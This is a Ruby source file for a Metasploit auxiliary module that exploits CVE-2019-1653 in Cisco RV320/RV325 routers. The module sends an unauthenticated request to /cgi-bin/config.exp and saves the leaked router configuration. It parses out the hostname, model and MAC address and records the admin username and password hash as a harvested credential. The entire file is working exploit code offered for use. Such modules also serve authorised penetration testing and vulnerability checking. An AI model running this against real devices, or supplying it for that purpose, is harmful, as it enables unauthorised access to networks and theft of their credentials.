Path: blob/master/modules/auxiliary/gather/cisco_rv320_config.rb
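##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Marker that identifies a successful configuration export in the response body.
  CONFIG_MARKER = '####sysconfig####'.freeze

  # Redirect stub that this module treats as a sign the device has been patched.
  PATCHED_MARKER = "meta http-equiv=refresh content='0; url=/default.htm'".freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Cisco RV320/RV325 Configuration Disclosure',
        'Description' => %q{
          A vulnerability in the web-based management interface of Cisco Small Business
          RV320 and RV325 Dual Gigabit WAN VPN routers could allow an unauthenticated,
          remote attacker to retrieve sensitive information. The vulnerability is due
          to improper access controls for URLs. An attacker could exploit this
          vulnerability by connecting to an affected device via HTTP or HTTPS and
          requesting specific URLs. A successful exploit could allow the attacker to
          download the router configuration or detailed diagnostic information. Cisco
          has released firmware updates that address this vulnerability.
        },
        'Author' => [
          'RedTeam Pentesting GmbH <[email protected]>',
          'Aaron Soto <[email protected]>'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['EDB', '46262'],
          ['BID', '106732'],
          ['CVE', '2019-1653'],
          ['URL', 'https://seclists.org/fulldisclosure/2019/Jan/52'],
          ['URL', 'https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801'],
          ['URL', 'https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-20110330-acs.html']
        ],
        'DisclosureDate' => '2019-01-24',
        'DefaultOptions' => {
          'SSL' => true
        },
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('TARGETURI', [true, 'Path to the device configuration file', '/cgi-bin/config.exp'])
      ]
    )
  end

  # Records the credential recovered from the configuration export against this
  # host and port in the database.
  #
  # @param user [String] value of the `user` line in the configuration
  # @param hash [String] value of the `password` line in the configuration
  # @return the result of create_credential_login
  def report_cred(user, hash)
    service_data = {
      address: rhost,
      port: rport,
      service_name: ssl ? 'https' : 'http',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      module_fullname: fullname,
      origin_type: :service,
      private_data: hash,
      private_type: :nonreplayable_hash,
      jtr_format: 'md5',
      username: user
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::UNTRIED
    }.merge(service_data)

    create_credential_login(login_data)
  end

  # Stores the exported configuration as loot and reports the host details and
  # the credential it contains to the database.
  #
  # Fields that are absent from the export are skipped instead of raising a
  # NoMethodError on a nil MatchData, so a partial export still yields loot.
  #
  # @param config [String] raw body of the configuration export
  # @return [void]
  def parse_config(config)
    # Report loot to database (and store on filesystem)
    stored_path = store_loot('cisco.rv.config', 'text/plain', rhost, config)
    print_good("Stored configuration (#{config.length} bytes) to #{stored_path}")

    # Report host information to database
    hostname = config_value(config, 'HOSTNAME')
    model = config_value(config, 'MODEL')
    mac = config_value(config, 'LANMAC')
    # LANMAC is exported without separators; re-insert colons for report_host.
    mac &&= mac.scan(/\w{2}/).join(':')
    host_data = {
      host: rhost,
      mac: mac,
      name: hostname,
      os_name: 'Cisco',
      os_flavor: model
    }
    # Drop fields the export did not provide rather than reporting them as nil.
    report_host(host_data.compact)

    # Report password hash to database
    user = config[/^user (.*)/, 1]
    hash = config[/^password (.*)/, 1]
    if user && hash
      report_cred(user, hash)
    else
      print_warning('Configuration did not contain a user/password pair; no credential reported')
    end
  end

  # Returns the value of the first `KEY=value` line in the configuration, or nil
  # when no such line exists.
  #
  # @param config [String] raw body of the configuration export
  # @param key [String] literal key name to look up
  # @return [String, nil]
  def config_value(config, key)
    config[/^#{Regexp.escape(key)}=(.*)/, 1]
  end

  # Requests TARGETURI and dispatches on the response: a configuration export is
  # parsed, the patched-firmware redirect is reported as not vulnerable, and any
  # other body is reported as an unexpected reply instead of being misclassified.
  def run
    uri = normalize_uri(target_uri.path)
    begin
      res = send_request_cgi({
        'uri' => uri,
        'method' => 'GET'
      }, 60)
    rescue OpenSSL::SSL::SSLError
      fail_with(Failure::UnexpectedReply, 'SSL handshake failed. Consider setting SSL to false and trying again.')
    end

    if res.nil?
      fail_with(Failure::UnexpectedReply, 'Empty response. Please validate the RHOST and TARGETURI options and try again.')
    elsif res.code != 200
      fail_with(Failure::UnexpectedReply, "Unexpected HTTP #{res.code} response. Please validate the RHOST and TARGETURI options and try again.")
    end

    body = res.body.to_s
    if body.include?(CONFIG_MARKER)
      parse_config(body)
    elsif body.include?(PATCHED_MARKER)
      fail_with(Failure::NotVulnerable, 'Response suggests device is patched')
    else
      # The original `else body.include? ...` discarded the check and reported every
      # non-export body as patched; an unrecognised body is an unexpected reply.
      fail_with(Failure::UnexpectedReply, 'Response contained neither a configuration export nor the expected redirect. Please validate the TARGETURI option and try again.')
    end
  end
end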